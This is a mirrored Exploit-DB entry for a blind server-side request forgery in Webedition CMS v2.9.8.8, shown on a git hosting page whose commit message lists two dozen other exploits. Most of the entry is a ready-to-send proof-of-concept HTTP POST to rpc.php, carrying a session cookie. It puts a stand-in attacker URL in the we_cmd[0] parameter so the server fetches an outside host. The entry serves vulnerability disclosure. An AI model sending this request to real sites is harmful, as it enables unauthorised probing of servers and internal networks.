bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51743.txt
Exploit-DB f3649a641f DB: 2023-10-10 
24 changes to exploits/shellcodes/ghdb

Minio 2022-07-29T19-40-48Z - Path traversal

Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service

Atcom 2.7.x.x - Authenticated Command Injection

Ruijie Reyee Mesh Router - MITM Remote Code Execution (RCE)
Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change
Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Credentials Extraction

OpenPLC WebServer 3 - Denial of Service

Splunk 9.0.5 - admin account take over

BoidCMS v2.0.0 - authenticated file upload vulnerability

Cacti 1.2.24 - Authenticated command injection when using SNMP options

Chitor-CMS v1.1.2 - Pre-Auth SQL Injection

Clcknshop 1.0.0 - SQL Injection

Coppermine Gallery 1.6.25 - RCE

Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)

GLPI GZIP(Py3) 9.4.5 - RCE

Limo Booking Software v1.0 - CORS

Media Library Assistant Wordpress Plugin - RCE and LFI

Online ID Generator 1.0 - Remote Code Execution (RCE)

Shuttle-Booking-Software v1.0 - Multiple-SQLi

Webedition CMS v2.9.8.8 - Blind SSRF

WEBIGniter v28.7.23 File Upload - Remote Code Execution

Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation

Wordpress Sonaar Music Plugin 4.7 - Stored XSS

Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)
2023-10-10 00:16:32 +00:00

39 lines
No EOL
1.3 KiB
Text
Raw Blame History

Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRF
Application: Webedition CMS
Version: v2.9.8.8
Bugs: Blind SSRF
Technology: PHP
Vendor URL: https://www.webedition.org/
Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
Date of found: 07.09.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
write https://youserver/test.xml to we_cmd[0] parameter
poc request
POST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1
Host: localhost
Content-Length: 141
sec-ch-ua:
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/webEdition/index.php?we_cmd[0]=startWE
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300
Connection: close
we_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3
Reference in a new issue View git blame Copy permalink